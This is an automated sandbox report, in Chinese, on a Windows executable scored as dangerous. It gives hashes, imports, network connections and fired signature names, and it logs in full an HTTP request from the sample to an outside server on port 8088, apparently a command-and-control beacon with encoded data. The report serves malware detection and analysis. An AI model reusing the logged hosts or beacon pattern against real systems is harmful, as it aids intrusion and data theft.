比较分析...

分析任务

分析类型 虚拟机标签 开始时间 结束时间 持续时间
文件 (Windows) win7-sp1-x64-shaapp02-1 2023-06-07 21:03:08 2023-06-07 21:05:19 131 秒

魔盾分数

10.0

危险的

文件详细信息

文件名 BBBgCd.exe
文件大小 5468160 字节
文件类型 PE32 executable (GUI) Intel 80386, for MS Windows
MD5 616962b526b69b6b1547ae7e36c88d95
SHA1 9249d816c8360d31e1fba60ffe40f3200302febd
SHA256 4ed65014dbfadcd23184c3f1add6e5a0d94b34c936ad32228f9e662cfd013c09
SHA512 6cd0104c4855aa35c27843acd95400cc214ad3d44c1959fd2f525add03dc4985af9f388990d2ca2bac1025c26ef118c5aa6298ba63430347fb5d99708b912f64
CRC32 DAC71357
Ssdeep 98304:DMwhDdfHHgNO5r29rYB4I2IHhIoeCDfs2KMAdAWedEVqxJHPTKV3O4:Hfg7qreCDf7KMAGZd4qxZPq31
Yara 登录查看Yara规则
找不到该样本 提交误报
登录查看威胁特征

运行截图

访问主机纪录 (可点击查询WPING实时安全评级)

直接 IP 安全评级 地理位置
121.204.252.143 中国
59.110.117.124 中国

域名解析 (可点击查询WPING实时安全评级)

域名 安全评级 响应
moamoamoa.oss-cn-beijing.aliyuncs.com 未知 A 59.110.117.124

摘要

登录查看详细行为信息

PE 信息

初始地址 0x00400000
入口地址 0x004addd5
声明校验值 0x00000000
实际校验值 0x0053fc69
最低操作系统版本要求 4.0
编译时间 2023-02-05 16:47:49
载入哈希 35c91177c389e917ad24897bc4ed16c5

PE 数据组成

名称 虚拟地址 虚拟大小 原始数据大小 特征 熵(Entropy)
.text 0x00001000 0x000cc9e6 0x000cd000 IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ 6.51
.rdata 0x000ce000 0x00438d02 0x00439000 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 7.89
.data 0x00507000 0x0005552a 0x0001a000 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 5.06
.rsrc 0x0055d000 0x00015740 0x00016000 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 6.63

导入

库: iphlpapi.dll:
0x4ce6f4 GetAdaptersInfo
库: WINMM.dll:
0x4ce658 midiStreamOut
0x4ce660 waveOutWrite
0x4ce664 waveOutPause
0x4ce668 waveOutReset
0x4ce66c waveOutClose
0x4ce670 waveOutGetNumDevs
0x4ce674 waveOutOpen
0x4ce67c midiStreamOpen
0x4ce680 midiStreamProperty
0x4ce684 midiStreamStop
0x4ce688 midiOutReset
0x4ce68c midiStreamClose
0x4ce690 midiStreamRestart
0x4ce698 waveOutRestart
库: WS2_32.dll:
0x4ce6b4 WSACleanup
0x4ce6b8 inet_ntoa
0x4ce6bc closesocket
0x4ce6c0 getpeername
0x4ce6c4 accept
0x4ce6c8 ntohl
0x4ce6cc WSAAsyncSelect
0x4ce6d0 recvfrom
0x4ce6d4 ioctlsocket
0x4ce6d8 recv
库: KERNEL32.dll:
0x4ce174 GetSystemDirectoryA
0x4ce178 SetLastError
0x4ce188 GetVersion
0x4ce18c TerminateThread
0x4ce190 CreateMutexA
0x4ce194 TerminateProcess
0x4ce198 SuspendThread
0x4ce1a0 GetACP
0x4ce1a4 HeapSize
0x4ce1a8 RaiseException
0x4ce1ac GetLocalTime
0x4ce1b0 GetSystemTime
0x4ce1b4 RtlUnwind
0x4ce1b8 GetStartupInfoA
0x4ce1bc GetOEMCP
0x4ce1c0 GetCPInfo
0x4ce1c4 GetProcessVersion
0x4ce1c8 SetErrorMode
0x4ce1cc GlobalFlags
0x4ce1d0 GetCurrentThread
0x4ce1d4 GetFileTime
0x4ce1d8 TlsGetValue
0x4ce1dc LocalReAlloc
0x4ce1e0 TlsSetValue
0x4ce1e4 TlsFree
0x4ce1e8 GlobalHandle
0x4ce1ec TlsAlloc
0x4ce1f0 LocalAlloc
0x4ce1f4 lstrcmpA
0x4ce1f8 GlobalGetAtomNameA
0x4ce1fc GlobalAddAtomA
0x4ce200 GlobalFindAtomA
0x4ce204 GlobalDeleteAtom
0x4ce208 lstrcmpiA
0x4ce20c SetEndOfFile
0x4ce210 UnlockFile
0x4ce214 LockFile
0x4ce218 FlushFileBuffers
0x4ce21c DuplicateHandle
0x4ce220 lstrcpynA
0x4ce22c LocalFree
0x4ce238 GetCurrentProcess
0x4ce23c GetFileSize
0x4ce240 SetFilePointer
0x4ce244 CreateSemaphoreA
0x4ce248 ResumeThread
0x4ce24c ReleaseSemaphore
0x4ce258 GetProfileStringA
0x4ce25c WriteFile
0x4ce264 CreateFileA
0x4ce268 DeviceIoControl
0x4ce26c SetEvent
0x4ce270 FindResourceA
0x4ce274 LoadResource
0x4ce278 LockResource
0x4ce27c ReadFile
0x4ce280 lstrlenW
0x4ce284 GetModuleFileNameA
0x4ce288 WideCharToMultiByte
0x4ce28c MultiByteToWideChar
0x4ce290 GetCurrentThreadId
0x4ce294 ExitProcess
0x4ce298 GlobalSize
0x4ce29c GlobalFree
0x4ce2a8 lstrcatA
0x4ce2ac lstrlenA
0x4ce2b0 WinExec
0x4ce2b4 lstrcpyA
0x4ce2b8 FindNextFileA
0x4ce2bc InterlockedExchange
0x4ce2c0 GlobalReAlloc
0x4ce2c4 HeapFree
0x4ce2c8 HeapReAlloc
0x4ce2cc GetProcessHeap
0x4ce2d0 HeapAlloc
0x4ce2d4 GetUserDefaultLCID
0x4ce2d8 GetFullPathNameA
0x4ce2dc FreeLibrary
0x4ce2e0 LoadLibraryA
0x4ce2e4 GetLastError
0x4ce2e8 GetVersionExA
0x4ce2f0 CreateThread
0x4ce2f4 CreateEventA
0x4ce2f8 Sleep
0x4ce2fc GlobalAlloc
0x4ce300 GlobalLock
0x4ce304 GlobalUnlock
0x4ce308 GetTempPathA
0x4ce30c FindFirstFileA
0x4ce310 FindClose
0x4ce314 SetFileAttributesA
0x4ce318 GetFileAttributesA
0x4ce31c MoveFileA
0x4ce320 DeleteFileA
0x4ce324 CreateDirectoryA
0x4ce330 GetModuleHandleA
0x4ce334 GetProcAddress
0x4ce338 MulDiv
0x4ce33c GetCommandLineA
0x4ce340 GetTickCount
0x4ce344 CreateProcessA
0x4ce348 WaitForSingleObject
0x4ce34c CloseHandle
0x4ce360 SetHandleCount
0x4ce364 GetStdHandle
0x4ce368 GetFileType
0x4ce370 HeapDestroy
0x4ce374 HeapCreate
0x4ce378 VirtualFree
0x4ce380 LCMapStringA
0x4ce384 LCMapStringW
0x4ce388 VirtualAlloc
0x4ce38c IsBadWritePtr
0x4ce394 GetStringTypeA
0x4ce398 GetStringTypeW
0x4ce39c CompareStringA
0x4ce3a0 CompareStringW
0x4ce3a4 IsBadReadPtr
0x4ce3a8 IsBadCodePtr
0x4ce3ac SetStdHandle
0x4ce3b0 ReleaseMutex
库: USER32.dll:
0x4ce3f4 GetWindow
0x4ce3f8 GetActiveWindow
0x4ce3fc SetFocus
0x4ce400 IsIconic
0x4ce404 PeekMessageA
0x4ce408 SetMenu
0x4ce40c GetMenu
0x4ce410 SetWindowRgn
0x4ce414 GetMessagePos
0x4ce418 ScreenToClient
0x4ce41c GetSysColorBrush
0x4ce420 GetKeyState
0x4ce428 IsWindowEnabled
0x4ce42c ShowWindow
0x4ce434 LoadImageA
0x4ce43c ClientToScreen
0x4ce440 EnableMenuItem
0x4ce444 GetSubMenu
0x4ce448 GetDlgCtrlID
0x4ce450 CreateMenu
0x4ce454 ModifyMenuA
0x4ce458 AppendMenuA
0x4ce45c CreatePopupMenu
0x4ce460 DrawIconEx
0x4ce46c SetRectEmpty
0x4ce470 DispatchMessageA
0x4ce474 GetMessageA
0x4ce47c CopyRect
0x4ce480 LoadBitmapA
0x4ce484 WinHelpA
0x4ce488 KillTimer
0x4ce48c SetTimer
0x4ce490 ReleaseCapture
0x4ce494 GetCapture
0x4ce498 SetCapture
0x4ce49c GetScrollRange
0x4ce4a0 SetScrollRange
0x4ce4a4 SetScrollPos
0x4ce4a8 LoadStringA
0x4ce4b0 GetMenuState
0x4ce4b4 SetMenuItemBitmaps
0x4ce4b8 CheckMenuItem
0x4ce4bc SetRect
0x4ce4c0 InflateRect
0x4ce4c4 IntersectRect
0x4ce4c8 PtInRect
0x4ce4cc OffsetRect
0x4ce4d0 IsWindowVisible
0x4ce4d4 EnableWindow
0x4ce4d8 RedrawWindow
0x4ce4dc GetWindowLongA
0x4ce4e0 SetWindowLongA
0x4ce4e4 GetSysColor
0x4ce4e8 SetActiveWindow
0x4ce4ec SetCursorPos
0x4ce4f0 LoadCursorA
0x4ce4f4 SetCursor
0x4ce4f8 GetDC
0x4ce4fc FillRect
0x4ce500 IsRectEmpty
0x4ce504 ReleaseDC
0x4ce508 IsChild
0x4ce50c DestroyMenu
0x4ce510 SetForegroundWindow
0x4ce514 GetWindowRect
0x4ce518 EqualRect
0x4ce51c UpdateWindow
0x4ce520 ValidateRect
0x4ce524 InvalidateRect
0x4ce528 GetClientRect
0x4ce52c GetFocus
0x4ce530 GetParent
0x4ce534 GetTopWindow
0x4ce538 PostMessageA
0x4ce53c IsWindow
0x4ce540 SetParent
0x4ce544 DestroyCursor
0x4ce548 SendMessageA
0x4ce54c SetWindowPos
0x4ce550 MessageBoxA
0x4ce554 GetCursorPos
0x4ce558 GetSystemMetrics
0x4ce55c EmptyClipboard
0x4ce560 SetClipboardData
0x4ce564 OpenClipboard
0x4ce568 GetClipboardData
0x4ce56c CloseClipboard
0x4ce570 wsprintfA
0x4ce574 WaitForInputIdle
0x4ce578 WindowFromPoint
0x4ce57c DrawFocusRect
0x4ce580 DrawEdge
0x4ce584 DrawFrameControl
0x4ce588 TranslateMessage
0x4ce58c LoadIconA
0x4ce590 GetDesktopWindow
0x4ce594 GetClassNameA
0x4ce598 GetDlgItem
0x4ce59c GetWindowTextA
0x4ce5a0 GetForegroundWindow
0x4ce5a4 DefWindowProcA
0x4ce5a8 GetClassInfoA
0x4ce5ac IsZoomed
0x4ce5b0 PostQuitMessage
0x4ce5b4 DestroyIcon
0x4ce5bc UnregisterClassA
0x4ce5c8 CharUpperA
0x4ce5cc GetWindowDC
0x4ce5d0 BeginPaint
0x4ce5d4 EndPaint
0x4ce5d8 TabbedTextOutA
0x4ce5dc DrawTextA
0x4ce5e0 GrayStringA
0x4ce5e4 DestroyWindow
0x4ce5ec EndDialog
0x4ce5f0 GetNextDlgTabItem
0x4ce5f4 GetWindowPlacement
0x4ce5fc GetLastActivePopup
0x4ce600 GetMessageTime
0x4ce604 RemovePropA
0x4ce608 CallWindowProcA
0x4ce60c GetPropA
0x4ce610 UnhookWindowsHookEx
0x4ce614 SetPropA
0x4ce618 GetClassLongA
0x4ce61c CallNextHookEx
0x4ce620 SetWindowsHookExA
0x4ce624 CreateWindowExA
0x4ce628 GetMenuItemID
0x4ce62c GetMenuItemCount
0x4ce630 RegisterClassA
0x4ce634 GetScrollPos
0x4ce638 AdjustWindowRectEx
0x4ce63c MapWindowPoints
0x4ce640 SendDlgItemMessageA
0x4ce644 ScrollWindowEx
0x4ce648 IsDialogMessageA
0x4ce64c SetWindowTextA
0x4ce650 MoveWindow
库: GDI32.dll:
0x4ce024 GetViewportExtEx
0x4ce028 ExtSelectClipRgn
0x4ce02c LineTo
0x4ce030 MoveToEx
0x4ce034 ExcludeClipRect
0x4ce038 GetClipBox
0x4ce03c GetStockObject
0x4ce040 GetObjectA
0x4ce044 EndPage
0x4ce048 EndDoc
0x4ce04c DeleteDC
0x4ce050 StartDocA
0x4ce054 StartPage
0x4ce058 BitBlt
0x4ce05c CreateCompatibleDC
0x4ce060 Ellipse
0x4ce064 Rectangle
0x4ce068 LPtoDP
0x4ce06c PtVisible
0x4ce070 GetCurrentObject
0x4ce074 RoundRect
0x4ce07c GetDeviceCaps
0x4ce080 CreateDIBitmap
0x4ce084 DeleteObject
0x4ce088 SelectClipRgn
0x4ce08c CreatePolygonRgn
0x4ce090 GetClipRgn
0x4ce094 SetStretchBltMode
0x4ce09c SetBkColor
0x4ce0a0 ScaleWindowExtEx
0x4ce0a4 SetWindowExtEx
0x4ce0a8 SetWindowOrgEx
0x4ce0ac ScaleViewportExtEx
0x4ce0b0 SetViewportExtEx
0x4ce0b4 OffsetViewportOrgEx
0x4ce0b8 SetViewportOrgEx
0x4ce0bc SetMapMode
0x4ce0c0 SetTextColor
0x4ce0c4 SetROP2
0x4ce0c8 SetPolyFillMode
0x4ce0cc RectVisible
0x4ce0d0 TextOutA
0x4ce0d4 ExtTextOutA
0x4ce0d8 Escape
0x4ce0dc GetTextMetricsA
0x4ce0e0 CreateFontIndirectA
0x4ce0e4 CreateSolidBrush
0x4ce0e8 FillRgn
0x4ce0ec CreateRectRgn
0x4ce0f0 CombineRgn
0x4ce0f4 PatBlt
0x4ce0f8 CreatePen
0x4ce0fc SelectObject
0x4ce100 CreateBitmap
0x4ce104 CreateDCA
0x4ce10c GetPolyFillMode
0x4ce110 GetStretchBltMode
0x4ce114 GetROP2
0x4ce118 GetBkColor
0x4ce11c GetBkMode
0x4ce120 GetTextColor
0x4ce124 CreateRoundRectRgn
0x4ce128 CreateEllipticRgn
0x4ce12c SetBkMode
0x4ce130 RestoreDC
0x4ce134 SaveDC
0x4ce138 PathToRegion
0x4ce13c EndPath
0x4ce140 BeginPath
0x4ce144 GetWindowOrgEx
0x4ce148 GetViewportOrgEx
0x4ce14c GetWindowExtEx
0x4ce150 GetDIBits
0x4ce154 RealizePalette
0x4ce158 SelectPalette
0x4ce160 DPtoLP
0x4ce164 StretchBlt
0x4ce168 CreatePalette
库: WINSPOOL.DRV:
0x4ce6a4 OpenPrinterA
0x4ce6a8 DocumentPropertiesA
0x4ce6ac ClosePrinter
库: ADVAPI32.dll:
0x4ce000 RegOpenKeyExA
0x4ce004 RegSetValueExA
0x4ce008 RegQueryValueA
0x4ce00c RegCreateKeyExA
0x4ce010 RegCloseKey
库: SHELL32.dll:
0x4ce3e4 Shell_NotifyIconA
0x4ce3e8 ShellExecuteA
库: ole32.dll:
0x4ce6fc CLSIDFromProgID
0x4ce700 OleRun
0x4ce704 CoCreateInstance
0x4ce708 CLSIDFromString
0x4ce70c OleUninitialize
0x4ce710 OleInitialize
库: OLEAUT32.dll:
0x4ce3b8 UnRegisterTypeLib
0x4ce3bc LoadTypeLib
0x4ce3c0 LHashValOfNameSys
0x4ce3c4 RegisterTypeLib
0x4ce3c8 SysAllocString
0x4ce3cc VariantInit
0x4ce3d0 VariantCopyInd
0x4ce3d4 VariantChangeType
0x4ce3d8 VariantClear
库: COMCTL32.dll:
0x4ce018 None
0x4ce01c ImageList_Destroy
库: comdlg32.dll:
0x4ce6e0 ChooseColorA
0x4ce6e4 GetFileTitleA
0x4ce6e8 GetSaveFileNameA
0x4ce6ec GetOpenFileNameA
.text
`.rdata
@.data
.rsrc
D$,ree
D$ ary
没有防病毒引擎扫描信息!

进程树

BBBgCd.exe, PID: 2684, 上一级进程 PID: 2312
下载PCAP包

访问主机纪录 (可点击查询WPING实时安全评级)

直接 IP 安全评级 地理位置
121.204.252.143 中国
59.110.117.124 中国

TCP

源地址 源端口 目标地址 目标端口
192.168.122.201 49164 121.204.252.143 8088
192.168.122.201 49160 23.219.38.8 80
192.168.122.201 49161 59.110.117.124 moamoamoa.oss-cn-beijing.aliyuncs.com 443
192.168.122.201 49162 59.110.117.124 moamoamoa.oss-cn-beijing.aliyuncs.com 443

UDP

源地址 源端口 目标地址 目标端口
192.168.122.201 57526 192.168.122.1 53
192.168.122.201 63246 192.168.122.1 53

域名解析 (可点击查询WPING实时安全评级)

域名 安全评级 响应
moamoamoa.oss-cn-beijing.aliyuncs.com 未知 A 59.110.117.124

TCP

源地址 源端口 目标地址 目标端口
192.168.122.201 49164 121.204.252.143 8088
192.168.122.201 49160 23.219.38.8 80
192.168.122.201 49161 59.110.117.124 moamoamoa.oss-cn-beijing.aliyuncs.com 443
192.168.122.201 49162 59.110.117.124 moamoamoa.oss-cn-beijing.aliyuncs.com 443

UDP

源地址 源端口 目标地址 目标端口
192.168.122.201 57526 192.168.122.1 53
192.168.122.201 63246 192.168.122.1 53

HTTP 请求

URI HTTP数据
URL专业沙箱检测 -> http://acroipm.adobe.com/11/rdr/CHS/win/nooem/none/message.zip 
GET /11/rdr/CHS/win/nooem/none/message.zip HTTP/1.1
Accept: */*
If-Modified-Since: Mon, 08 Nov 2017 08:44:36 GMT
User-Agent: IPM
Host: acroipm.adobe.com
Connection: Keep-Alive
Cache-Control: no-cache
URL专业沙箱检测 -> http://121.204.252.143:8088/c.asp?code=CwNLBBBJARWBBBBBN%%2b/u/cRTOouh2vDLC0NwKNeza64NRKwolnOr2%%2b0/dqsueySYwuIMBlRP0JO29CKSDBOV/AolKNPTQPd%%2bkrYhPkpjEgrhXbTQ33ubWJ9c0TEPPLXLeQSd9Nscv5ScGztr6f3xQbmg1cBHFxenUH%%2bJjeORX/l7DYphGzaB9MjuBm%%2boE6IE3o4ju8JmRDNNe8odwQQ9bhWaXcV7pWysQMWLROFCMja87Te9ijeoXrdXzVQWEbMVAw81sKl/NAZkxvbk--23131 
GET /c.asp?code=CwNLBBBJARWBBBBBN%%2b/u/cRTOouh2vDLC0NwKNeza64NRKwolnOr2%%2b0/dqsueySYwuIMBlRP0JO29CKSDBOV/AolKNPTQPd%%2bkrYhPkpjEgrhXbTQ33ubWJ9c0TEPPLXLeQSd9Nscv5ScGztr6f3xQbmg1cBHFxenUH%%2bJjeORX/l7DYphGzaB9MjuBm%%2boE6IE3o4ju8JmRDNNe8odwQQ9bhWaXcV7pWysQMWLROFCMja87Te9ijeoXrdXzVQWEbMVAw81sKl/NAZkxvbk--23131 HTTP/1.0
Host: 121.204.252.143

SMTP 流量

无SMTP流量.

IRC 流量

无IRC请求.

ICMP 流量

无ICMP流量.

CIF 报告

无 CIF 结果

网络警报

无警报

TLS

Timestamp Source IP Source Port Destination IP Destination Port Version Issuer Subject Fingerprint
2023-06-07 21:03:32.118987+0800 192.168.122.201 49161 59.110.117.124 443 TLS 1.2 C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G3 C=CN, ST=ZheJiang, L=HangZhou, O=Alibaba (China) Technology Co., Ltd., CN=*.oss-cn-beijing.aliyuncs.com 2f:98:c9:44:1b:39:c7:12:16:ea:ff:02:a8:5f:b0:e0:df:32:ec:44
2023-06-07 21:03:34.451194+0800 192.168.122.201 49162 59.110.117.124 443 TLS 1.2 C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G3 C=CN, ST=ZheJiang, L=HangZhou, O=Alibaba (China) Technology Co., Ltd., CN=*.oss-cn-beijing.aliyuncs.com 2f:98:c9:44:1b:39:c7:12:16:ea:ff:02:a8:5f:b0:e0:df:32:ec:44

Suricata HTTP

No Suricata HTTP

未发现网络提取文件
抱歉! 没有任何文件投放。
没有发现相似的分析.
HTML 总结报告
(需15-60分钟同步)		 下载

Processing ( 46.35 seconds )

  • 12.41 NetworkAnalysis
  • 11.922 Static
  • 10.964 Suricata
  • 4.124 VirusTotal
  • 3.069 BehaviorAnalysis
  • 2.18 AnalysisInfo
  • 1.261 TargetInfo
  • 0.396 peid
  • 0.011 config_decoder
  • 0.011 Strings
  • 0.002 Memory

Signatures ( 4.402 seconds )

  • 1.444 network_http
  • 1.398 md_url_bl
  • 0.202 maldun_anomaly_massive_file_ops
  • 0.135 api_spamming
  • 0.097 stealth_timeout
  • 0.086 reads_self
  • 0.085 stealth_file
  • 0.085 antivm_generic_disk
  • 0.085 virus
  • 0.081 stealth_decoy_document
  • 0.074 rat_luminosity
  • 0.072 bootkit
  • 0.071 mimics_filetime
  • 0.07 maldun_malicious_write_executeable_under_temp_to_regrun
  • 0.061 maldun_anomaly_terminated_process
  • 0.056 maldun_anomaly_write_exe_and_dll_under_winroot_run
  • 0.055 maldun_anomaly_write_exe_and_obsfucate_extension
  • 0.024 antiav_detectreg
  • 0.023 ransomware_extensions
  • 0.021 antiav_detectfile
  • 0.015 infostealer_bitcoin
  • 0.015 infostealer_ftp
  • 0.011 ransomware_files
  • 0.01 md_domain_bl
  • 0.009 infostealer_im
  • 0.008 kovter_behavior
  • 0.008 antivm_vbox_files
  • 0.007 antiemu_wine_func
  • 0.007 infostealer_browser_password
  • 0.006 anomaly_persistence_autorun
  • 0.006 geodo_banking_trojan
  • 0.006 infostealer_mail
  • 0.005 antianalysis_detectreg
  • 0.004 tinba_behavior
  • 0.004 antidbg_devices
  • 0.003 antivm_vbox_libs
  • 0.002 network_tor
  • 0.002 rat_nanocore
  • 0.002 betabot_behavior
  • 0.002 kibex_behavior
  • 0.002 antivm_generic_scsi
  • 0.002 shifu_behavior
  • 0.002 exec_crash
  • 0.002 antianalysis_detectfile
  • 0.002 disables_browser_warn
  • 0.002 maldun_malicious_drop_executable_file_to_temp_folder
  • 0.002 network_torgateway
  • 0.002 rat_pcclient
  • 0.001 hawkeye_behavior
  • 0.001 antiav_avast_libs
  • 0.001 dridex_behavior
  • 0.001 antivm_vmware_libs
  • 0.001 injection_createremotethread
  • 0.001 antivm_generic_services
  • 0.001 antisandbox_sleep
  • 0.001 kazybot_behavior
  • 0.001 antisandbox_sunbelt_libs
  • 0.001 antisandbox_sboxie_libs
  • 0.001 antiav_bitdefender_libs
  • 0.001 dyre_behavior
  • 0.001 anormaly_invoke_kills
  • 0.001 cerber_behavior
  • 0.001 hancitor_behavior
  • 0.001 sniffer_winpcap
  • 0.001 antivm_parallels_keys
  • 0.001 antivm_vmware_files
  • 0.001 antivm_xen_keys
  • 0.001 banker_zeus_mutex
  • 0.001 bot_drive
  • 0.001 bot_drive2
  • 0.001 browser_security
  • 0.001 modify_proxy
  • 0.001 codelux_behavior
  • 0.001 darkcomet_regkeys
  • 0.001 malicous_targeted_flame
  • 0.001 md_bad_drop
  • 0.001 network_cnc_http

Reporting ( 0.564 seconds )

  • 0.501 ReportHTMLSummary
  • 0.063 Malheur
Task ID 721978
Mongo ID 648080ccdc327b4794064ec4
Cuckoo release 1.4-Maldun